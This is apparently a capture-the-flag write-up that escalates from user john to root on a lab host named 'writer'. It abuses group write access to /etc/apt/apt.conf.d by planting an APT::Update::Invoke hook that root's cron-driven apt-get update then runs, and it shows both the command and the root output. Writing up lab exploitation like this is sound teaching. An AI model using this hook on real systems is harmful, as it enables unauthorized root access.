APT
john@writer:~$ id
uid=1001(john) gid=1001(john) groups=1001(john),1003(management)
john@writer:~$ find / -group management -ls -type f 2>/dev/null
17525 4 drwxrwxr-x 2 root management 4096 apr 19 21:19 /etc/apt/apt.conf.dAs the john user from the lateral movement, I now have write access to the /etc/apt/apt.conf.d directory
This appears to be the final route to the root user as apt mostly deals with system resources with the highest privileges
2 critical clauses were disclosed by PSPY earlier. These are all part of the root cronjob processes that I enumerated
apt-get updateis a command used in Debian-based operating systems to update the local package database. This ensures that the package manager has the latest information about available software packages and their dependencies.- The other command is wiping out the modified files within the last day (
-mtime -1) in the/etc/apt/apt.conf,d/directory
according to an online source, this particular scenario can easily be abused for privilege escalation
john@writer:~$ echo 'APT::Update::Invoke {"id > /dev/shm/output.txt";};' > /etc/apt/apt.conf.d/00-peThe above command will effectively hook to the apt update command invoking the following command, id > /dev/shm/output.txt
number in beginning of files in the /etc/apt/apt.conf.d directory indicates the priority
Code execution confirmed
john@writer:~$ cat /dev/shm/output.txt
uid=0(root) gid=0(root) groups=0(root)Moving on to the Privilege Escalation phase